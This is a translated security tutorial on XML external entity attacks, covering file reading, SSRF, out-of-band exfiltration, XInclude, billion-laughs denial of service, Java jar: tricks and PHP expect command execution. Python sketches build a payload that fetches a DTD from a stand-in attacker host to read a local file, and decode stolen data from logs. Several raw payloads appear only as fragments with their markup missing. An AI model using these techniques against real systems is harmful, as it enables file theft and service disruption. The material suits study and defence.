XML security that you don't know about

Source: Internet
Author: User

0x00 Introduction to XML

XML (Extensible Markup Language) is designed to transmit and store data. It takes many forms, for example:

1. Document formats (OOXML, ODF, PDF, RSS, DOCX, ...)

2. Image formats (SVG, EXIF headers, ...)

3. Configuration files (custom names, usually ending in .xml)


Some features that XML has by design, such as XML Schema and document type definitions (DTDs), are sources of security issues. Even after more than a decade of public discussion, a large amount of software still falls to XML attacks.

In fact, the XML entity mechanism is easy to understand if you think of it as escaping: &#x25; and &foo; work the same way in principle, except that the content of the latter is whatever we define it to be.
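The comparison between a character reference and a self-defined entity can be tried out with Python's standard library. This is a minimal sketch: the document, the element name note and the replacement text are made up for illustration, and only the entity name foo comes from the text above.

```python
import xml.etree.ElementTree as ET

# Hypothetical document: "foo" is an entity we declare ourselves in the DTD,
# while &#x25; is a built-in character reference for "%".
DOC = """<!DOCTYPE note [
  <!ENTITY foo "content we chose">
]>
<note>&#x25; and &foo;</note>"""


def expand(doc: str) -> str:
    """Parse the document and return the root element's text after expansion."""
    return ET.fromstring(doc).text


if __name__ == "__main__":
    print(expand(DOC))
```

Both references are replaced by the parser before the application sees the text; the only difference is who decided what the replacement is.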

In a DTD, an entity declaration defines a variable (or a text macro) that can be used later in the DTD or in the XML document. An internal general entity is defined entirely inside the DTD, and its replacement text is substituted wherever the entity is referenced in the document. An external entity refers to an external resource, which may be on the local machine or on a remote host. While resolving an external entity, the XML parser may use many network protocols and services (DNS, FTP, HTTP, SMB, and so on), depending on the URL that is specified. External entities are useful for documents that are updated in real time, but attacks can occur while they are being resolved. The attacks include:

Reading local files (which may contain sensitive information, such as /etc/shadow)

Memory corruption

Arbitrary code execution

Denial of service

This article summarizes the XML attack techniques that have appeared over the years.

0x01 A first look at XML external entity attacks

File inclusion based on external entities

The earliest XML attack to be proposed uses external entity references to read arbitrary files.

]> Joe &file; ...

However, this kind of reading is limited, because the XML parser requires the referenced data to be complete (well-formed on its own). An example shows what "complete" means here.

]> &first;&second;

When this XML document is sent to the server, it actually produces an error. Although the two entities form a properly closed element when they are put together, each entity (declared on lines 3 and 4) is parsed on its own, and an error is thrown because neither of them is properly closed by itself.
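The "complete" requirement can be reproduced with Python's standard parser. The following is a sketch under assumptions: the entity values and the element names data and mytag are invented for illustration (only the entity names first and second come from the text), and other parsers may word the error differently.

```python
import xml.etree.ElementTree as ET

# Two entities that only form a closed element when concatenated.
SPLIT_TAG = """<!DOCTYPE data [
  <!ENTITY first "<my">
  <!ENTITY second "tag/>">
]>
<data>&first;&second;</data>"""

# Control case: one entity whose replacement text is closed on its own.
WHOLE_TAG = """<!DOCTYPE data [
  <!ENTITY whole "<mytag/>">
]>
<data>&whole;</data>"""


def parses(doc: str) -> bool:
    """Return True if the document parses, False if the parser rejects it."""
    try:
        ET.fromstring(doc)
        return True
    except ET.ParseError:
        return False


if __name__ == "__main__":
    print("split across two entities:", parses(SPLIT_TAG))
    print("closed within one entity: ", parses(WHOLE_TAG))
```

The split version is rejected even though the concatenated text would be a valid element, because each entity's replacement text is checked separately.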

This error makes the attack of limited value, because many files are not "closed" in this sense. For example, the recommended practice for PHP files is to write only the opening tag and omit the closing one.

Worse, when you include a complete XML file (such as a database connection configuration file), the embedded document comes back with most of its content elided, showing only the structure of the document. This behavior is determined by the XML parser's properties.

URL invocation

One of the most frequently overlooked XML attacks uses URL schemes and some of their odd features to expand the attack surface.

Although the XML specification does not require support for any particular URL scheme, the underlying network libraries of many platforms support almost all of them.

With URLs, an attacker can make the host that runs the XML parser send malicious requests to a third-party host.

Server-side request forgery (SSRF) is one example. In theory, URL invocation can even be used to launch a flood attack inside an internal network.

What most people don't know is that even if external entities are disabled, many XML parsers will still resolve such URLs. For example, some parsers send a request to the URL given in the DOCTYPE declaration while processing it.

This is not an entity attack!

In addition to external entities and DOCTYPE-based SSRF attacks, XML Schema provides two special attributes for use in instance documents that indicate the location of a schema document: xsi:schemaLocation and xsi:noNamespaceSchemaLocation. The former is used for schema documents that declare a target namespace, and the latter for schema documents that have no target namespace.

In this case, everything with the secondaryns: prefix follows the schema associated with xmlns:secondaryns. Because a DOCTYPE declaration cannot appear in the middle of a document, schemaLocation (http://location/of/remote/schema/primary.xsd) lets us initiate SSRF even when we control only part of the document. (This requires certain parser settings to be turned on. We have not tested each XML parser thoroughly enough to know what different environments require for the SSRF attack to work, so this remains a research direction; interested WooYun members are welcome to discuss it.)
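To make the attribute format concrete, here is a small sketch that extracts the (namespace, location) pairs a schema-aware parser would see. The instance document and the example.com namespace URIs are hypothetical; only the secondaryns prefix and the schema URL are taken from the text. Python's ElementTree does not fetch these locations itself, so the sketch only shows where the URL lives.

```python
import xml.etree.ElementTree as ET

XSI = "http://www.w3.org/2001/XMLSchema-instance"

# Hypothetical instance document; the attacker is assumed to control only
# the inner element, not the top of the document.
INSTANCE = """<root xmlns="http://example.com/primary"
      xmlns:secondaryns="http://example.com/secondary"
      xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <secondaryns:item xsi:schemaLocation="http://example.com/secondary http://location/of/remote/schema/primary.xsd"/>
</root>"""


def schema_locations(doc: str):
    """Return (namespace, location) pairs from every xsi:schemaLocation attribute."""
    pairs = []
    for elem in ET.fromstring(doc).iter():
        value = elem.get(f"{{{XSI}}}schemaLocation")
        if value:
            # The attribute is a whitespace-separated list of namespace/URL pairs.
            tokens = value.split()
            pairs.extend(zip(tokens[0::2], tokens[1::2]))
    return pairs


if __name__ == "__main__":
    for namespace, location in schema_locations(INSTANCE):
        print(namespace, "->", location)
```

The second item of each pair is the URL that a parser with schema loading enabled might request, which is what makes the attribute usable from the middle of a document.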

0x02 Attack techniques after introducing parameter entities

When our malicious XML is parsed successfully, we are likely to face two problems:

First, the data is not closed, which causes the embedding to fail (for example, a file that contains only an opening tag).

Second, restrictions on the server prevent the data from being returned.

Introducing parameter entities solves both problems.

A parameter entity begins with %. When using parameter entities, we only need to follow two rules:

Parameter entities can only be used inside the DTD.

In the internal DTD subset, a parameter entity cannot be referenced inside another entity declaration.

CDATA: the magical escape

Everything inside a CDATA section is ignored by the XML parser as markup; that is, the content of a CDATA section is treated strictly as a string literal. A CDATA section begins with "<![CDATA[" and ends with "]]>". So can we construct a document that wraps a file in CDATA in order to get it returned?
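The effect of a CDATA section on unclosed content can be checked directly. This is an illustrative sketch: the PHP fragment and the element name data are invented, and the wrapping is done by plain string concatenation rather than by entities.

```python
import xml.etree.ElementTree as ET

# Hypothetical file content that is not well-formed XML on its own.
UNCLOSED = '<?php $password = "secret"; if ($a < $b) {'


def embed_raw(text: str) -> str:
    """Embed the text directly as element content."""
    return "<data>" + text + "</data>"


def embed_cdata(text: str) -> str:
    """Embed the text inside a CDATA section."""
    return "<data><![CDATA[" + text + "]]></data>"


def parse_text(doc: str):
    """Return the root element's text, or None if the parser rejects the document."""
    try:
        return ET.fromstring(doc).text
    except ET.ParseError:
        return None


if __name__ == "__main__":
    print("raw:  ", parse_text(embed_raw(UNCLOSED)))
    print("cdata:", parse_text(embed_cdata(UNCLOSED)))
```

The raw version fails to parse, while the CDATA version returns the fragment unchanged, which is the property the attack relies on.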

%DTD; ]> &all;

COMBINE.DTD is as follows

As mentioned earlier, the XML parser throws an error when it parses an entity whose content is not closed, so why does %start parse normally here? Because the replacement text of a parameter entity does not have to be closed XML on its own when the document is parsed, which bypasses the restriction.
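For orientation, the commonly published form of this technique can be written out as two strings. This is a sketch, not the author's exact payload: the entity names goodies and end, the element name data, the host evil.example.com and the target path are all assumptions, while start, DTD, all and combine.dtd follow the names used in the text.

```python
def build_combine_dtd() -> str:
    """External DTD: glue the three parameter entities into one general entity."""
    # Parameter entities may be referenced inside an entity value here because
    # this declaration lives in an external DTD, not in the internal subset.
    return '<!ENTITY all "%start;%goodies;%end;">'


def build_document(dtd_url: str, target_url: str) -> str:
    """Main document: declare the CDATA delimiters and the file as parameter entities."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>\n'
        "<!DOCTYPE data [\n"
        '  <!ENTITY % start "<![CDATA[">\n'
        f'  <!ENTITY % goodies SYSTEM "{target_url}">\n'
        '  <!ENTITY % end "]]>">\n'
        f'  <!ENTITY % DTD SYSTEM "{dtd_url}">\n'
        "  %DTD;\n"
        "]>\n"
        "<data>&all;</data>\n"
    )


if __name__ == "__main__":
    # Hypothetical host and file, for illustration only.
    print(build_document("http://evil.example.com/combine.dtd", "file:///etc/fstab"))
    print(build_combine_dtd())
```

When a parser that resolves external parameter entities expands &all;, the file content arrives already wrapped in a CDATA section, so it no longer has to be closed XML.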

By doing so we can read all the data (Base64 encoding is also possible)

Out-of-band data: bypassing echo restrictions

Another use of parameter entities is to carry the data out of band.

Using parameter entities, we can send the file we want to read to our own server over some protocol (HTTP, FTP, and so on), and then retrieve the data by looking at the logs. We can construct the following:

%DTD;] > &send;

Then, on http://example.com/, which we control, we place the following DTD:


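The process is as follows: the target parses our document, fetches the DTD from http://example.com/, reads the local file into a parameter entity, and then requests a URL on our server that carries the file content, which we recover from the access log.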
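Recovering the data on the receiving side could look like the sketch below. It assumes, purely for illustration, that the DTD sends the file content Base64-encoded in a query parameter named data and that the server log records the request line in the usual "METHOD target VERSION" form; neither detail is given in the original.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def extract_payload(request_line: str, param: str = "data"):
    """Return the decoded bytes carried in a logged request line, or None."""
    # Example request line: GET /?data=aGVsbG8= HTTP/1.1
    _method, target, _version = request_line.split(" ", 2)
    values = parse_qs(urlsplit(target).query).get(param)
    if not values:
        return None
    # parse_qs turns "+" into a space, so restore it before Base64 decoding.
    return base64.b64decode(values[0].replace(" ", "+"))


if __name__ == "__main__":
    print(extract_payload("GET /?data=aGVsbG8= HTTP/1.1"))
```

Encoding the file before it is placed in the URL avoids problems with line breaks and other characters that are not allowed in a request target.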


XXE's Qi Men Dun Jia (esoteric tricks)

XInclude-based file inclusion

XInclude provides a more convenient way to retrieve data (there is no need to worry about incomplete data causing the parser to throw an error), and we can force the type of the referenced file with the parse attribute.

However, XInclude has to be turned on manually, and our tests found that all of the XML parsers tested have this feature turned off by default.
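Python's standard library shows both points: XInclude is processed only when the application explicitly asks for it, and parse="text" lets content that is not well-formed XML through. This is a sketch with made-up file content and element names; it uses xml.etree.ElementInclude, which is Python's own implementation and not one of the parsers the article tested.

```python
import os
import tempfile
import xml.etree.ElementTree as ET
from xml.etree import ElementInclude
from xml.sax.saxutils import quoteattr


def include_as_text(path: str) -> str:
    """Pull a file into a document through XInclude with parse="text"."""
    doc = ET.fromstring(
        '<root xmlns:xi="http://www.w3.org/2001/XInclude">'
        f'<xi:include href={quoteattr(path)} parse="text"/>'
        "</root>"
    )
    # Nothing is included until the application makes this explicit call.
    ElementInclude.include(doc)
    return doc.text


def demo() -> str:
    """Write a hypothetical unclosed PHP file and include it."""
    with tempfile.NamedTemporaryFile(
        "w", suffix=".php", delete=False, encoding="utf-8"
    ) as handle:
        handle.write('<?php $password = "secret";')
        path = handle.name
    try:
        return include_as_text(path)
    finally:
        os.remove(path)


if __name__ == "__main__":
    print(demo())
```

Because the file is included as text rather than parsed as XML, the missing closing tag does not cause an error.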

Denial of Service

XXE attacks can also be used to launch denial-of-service attacks.

In the following nested references, the expansion grows exponentially from the bottom level to the top:

]> &lol9;

Recall the parsing process: when the XML processor loads the document, it finds that the root element contains the entity reference &lol9;, which is defined and expands to a string of ten &lol8; references: "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;".

Expanding recursively in this way, the amount of data loaded into memory grows exponentially. Experiments have found that an XML payload of less than 1 KB can consume 3 GB of memory.
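The numbers can be checked with a little arithmetic, without ever parsing the payload. The sketch assumes the widely known layout of this attack: a base entity lol whose value is the three-character string "lol", and nine levels that each reference the previous level ten times. The element name lolz and the exact layout are assumptions, since the original payload is not reproduced here.

```python
def build_payload(levels: int = 9, fanout: int = 10, base: str = "lol") -> str:
    """Build the nested-entity document as text (it is never parsed here)."""
    lines = ['<?xml version="1.0"?>', "<!DOCTYPE lolz [", f'<!ENTITY lol "{base}">']
    previous = "lol"
    for level in range(1, levels + 1):
        references = f"&{previous};" * fanout
        lines.append(f'<!ENTITY lol{level} "{references}">')
        previous = f"lol{level}"
    lines += ["]>", f"<lolz>&{previous};</lolz>"]
    return "\n".join(lines)


def expanded_size(levels: int = 9, fanout: int = 10, base: str = "lol") -> int:
    """Number of characters produced once every reference is expanded."""
    return len(base) * fanout ** levels


if __name__ == "__main__":
    print("payload size:", len(build_payload()), "characters")
    print("expanded size:", expanded_size(), "characters")
```

Under these assumptions the document stays below 1 KB while the fully expanded text is 3 × 10^9 characters, which matches the roughly 3 GB figure quoted above.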

Attacks and limitations in specific environments


The default XML parser in Oracle's Java Runtime Environment is Xerces, an Apache project. Xerces and Java provide a range of features that can lead to serious security problems. The attack techniques described above (DOCTYPE-based SSRF, file reading, out-of-band data through parameter entities) all work in Java's default configuration. Java/Xerces also supports XInclude, but this requires setXIncludeAware(true) and setNamespaceAware(true).

Java supports a number of URL schemes, including the file and jar schemes discussed below.

Surprisingly, Java's file protocol can be used to list directories. For example, on Linux, "file:///" lists everything in the / directory.

The jar protocol, as in jar:http://host/application.jar!/file/within/the/zip, causes the server to fetch the archive first, then unpack it and extract the file named after the "!". From an attacker's point of view, it is entirely possible to craft archives with very high compression ratios (such as 1000:1), which can be used to attack antivirus systems or to exhaust the disk or memory of the target machine. Note that jar URLs can be used on any Java Xerces system that accepts DOCTYPE declarations, so the attack works even when external entities are disabled.
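The structure of a jar URL explains why the whole archive is fetched before anything else happens. The helper below is an illustrative sketch in Python, not Java's own implementation; split_jar_url is a hypothetical name.

```python
def split_jar_url(url: str):
    """Split a jar: URL into the archive URL and the entry path inside it."""
    if not url.startswith("jar:"):
        raise ValueError("not a jar: URL")
    # Everything before "!/" is an ordinary URL that has to be downloaded in
    # full; everything after it names a file inside the downloaded archive.
    archive_url, separator, entry = url[len("jar:"):].partition("!/")
    if not separator:
        raise ValueError("missing '!/' separator")
    return archive_url, entry


if __name__ == "__main__":
    print(split_jar_url("jar:http://host/application.jar!/file/within/the/zip"))
```

The archive URL is under the attacker's control, so its size and compression ratio are too.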

PHP & expect RCE

Unfortunately for the attacker, the expect extension is not installed by default, but where it is installed, an XXE vulnerability can be used to execute arbitrary commands.



Then it will return the following

uid=501(Apple) gid=20(staff) groups=20(staff),501(access_bpf),(everyone),(localaccounts),(_appserverusr),(admin),81(_appserveradm),(_lpadmin),401(com.apple.sharepoint.group.1),(_appstore),(_lpoperator),204(_developer),398(com.apple.access_screensharing),399(com.apple.access_ssh)

XML injection

This has nothing to do with XXE attacks, but since this article is about XML security, it is included here.

PHP does not escape $GLOBALS["HTTP_RAW_POST_DATA"], so once a program takes data from the XML it receives this way and passes it directly into a MySQL query, the result is SQL injection.

A case is as follows:

WooYun: PHPYun latest version, XML injection and SQL injection to obtain the admin account (bypassing any defenses)

0x03 Summary

XXE attacks are always overlooked.

Developers often say:

"The attack is not much of a threat."

"Disabling entities avoids it completely ..."

"What is an XML entity attack?"

However, XML entity attacks have already produced many threats that developers did not expect.
